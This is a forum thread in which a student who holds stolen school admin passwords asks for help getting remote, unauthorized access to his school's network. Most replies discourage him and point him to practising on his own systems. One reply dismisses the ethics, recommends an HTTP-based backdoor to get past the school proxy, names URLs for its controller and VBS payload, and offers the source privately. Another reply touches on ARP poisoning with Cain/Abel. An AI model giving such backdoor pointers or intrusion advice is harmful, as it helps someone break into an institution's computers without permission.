how bout a challenge...
well first of all i do realize that u are all goin to be like google it or insult me but i dont care… this is really pissing me off. haha so i got multiple admin passwords for my school (easy) ip addresses(even easier) n ive pissed off a few people in cmd(i kno script kiddie times 10000) but i think its time to step up my game a little ha say i wanted to access my school remotely n that is were the fun begins… my school(unlike other schools out there which basically sound like a bunch of home computers in a stupid concrete room) are alittle bit more sophisticated. they put a somewhat good amount of time into there network but with a crappy network admin i could basically put a folder full of pointless batch files n it would just sit there until they clean the drives during the summer its that bad i would like some input on where to begin.. i kno how to use most programs(script kiddie written all over me) but im also learning code at the same time
i could provide more info if u need more
i basically could tell u almost everything bout them bc ive been working onmarkup[code]
[/code] them for like 3 years now. ha
i dont necessarily want a step by step but a push rather in the right direction.
thanks:):)
Good grammar is key first off. Most people wont bother reading that garble unless you spell things right.
Second, you have your priorities wrong there, a school is a government institution and not to be toyed with. Hacking is an art, not something for you to recklessly jump into only wanting to show off like that.
I'll be honest, it's people like you that give a majority of us bad names to start with, contributing even more to that bloody stereotype that haunts any and all white-hat hackers still out there.
Put simply the right direction is to stop, hacking is not meant to be used for such purposes, rather the betterment of mankind as a hole, dont abuse power that you have learned.
Lemur wrote: I'll be honest, it's people like you that give a majority of us bad names to start with, contributing even more to that bloody stereotype that haunts any and all white-hat hackers still out there.
I'll be nice because I like you. Never, ever, ever, group all of "us" into the "white-hat" category.
There's people who won't like that one bit, because it simply isn't true.
@OP: Let it go. Relax. We've all heard the "hack my school" story, and it's really always the same.
By the way, if I was your network admin, and I had my system locked up properly, I wouldn't give two shits if you had "batch files everywhere" or access to cmd. Because you still can't do anything.
Just being able to use both of those things isn't an "exploit", not even a "vulnerability".
There needs to be a deeper configuration problem. Wayy deeper.
Groups like white and black hats? Dont be stupid, pls… I am not interested if you use your knowledge to good things or bad things… School is good point to start, why to do it? Because you are evil? No… because you want try how much you know… You said you want remote access, right? Well, most network computers are connected to internet via one proxy server, right? So they dont have anything like public IP, think about it ;-). I mean you need backdoor working over http (like some using ie or irc to download its commands from some webpage or irc server and uploading there its output). I have something like that, controller is on http://kladenka.nazory.cz/ScriptCat/client.php and server (backdoor side) is on http://kladenka.nazory.cz/ScriptCat/sc.vbs. If you want all sources, just pm me, I will send it, you can study :). If you want something on linux, I can give you contact on one friend of mine, he is guru…;)
When you try to do something you don’t know how to do properly, plan for the worst. This means getting caught by someone. It also means getting expelled. I can log into a couple teacher accounts at my school, but because I don't know a ton about networks/hacking, there is no point to me bumping aimlessly around. If something was accidentally deleted or the network went down, It might not even be up to the admins to decide what to do with you (and my school’s are pretty heartless.)
Start with something you won’t get expelled for. Maybe your own computer or network (hint hint).
But use some common sence. Your school isn't the right place for you.
The point isn't whether it's good or evil, the point is that starting out by hacking a school leaves you wide open to get caught. why? Because someone that just started doesn't know how to cover their tracks well, making even a half-wit admin a threat.
If you want to play, try practicing at home, playing both the role of the admin and the hacker, if you on the admin role can find yourself as a hacker, then keep trying until you cant trace yourself (Assuming that made sense)
i hear what people are saying. and i agree with all of them. im definitely not trying to give "hackers" a bad name i just wanted some input but i guess its hard to do on this site if u dont already know everything. for clarification… i wasnt saying that ive been trying to hack them for 3 years i was trying to say that the school system hasnt updated any of the computers for about 3 years… which in turn would mean that theyve been the same. thats my fault.
also some people are saying school is bad and others is school. i wanted to use school as my training wheels per say. and my school is so dumb that the people that have gotten caught, have been caught because someone caught them in the act… not through tracing or watever.
thanks anyway
Uber0n wrote: [quote]Lemur wrote: If you want to play, try practicing at home, playing both the role of the admin and the hacker, if you on the admin role can find yourself as a hacker, then keep trying until you cant trace yourself
Very well said, Lemur ^1
I do that to myself, and Cain/Abel is way too easy to track due to ARP Poisoning and Sniffing trackers ou there, I still havent found a way to keep it low-key, so avoid that.
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you're on your way to getting the acid-dazed/blazed leet speak down at least. no offence
And this place isn't only for the best of the best. It has the different chalanges to help people become better.
My summing up: If you want to front-load everything about hacking networks by trying to hack your school, go for it. But you need to make sure you are not skipping over anything. Otherwise you might be better off directly asking the admin for their password (joking).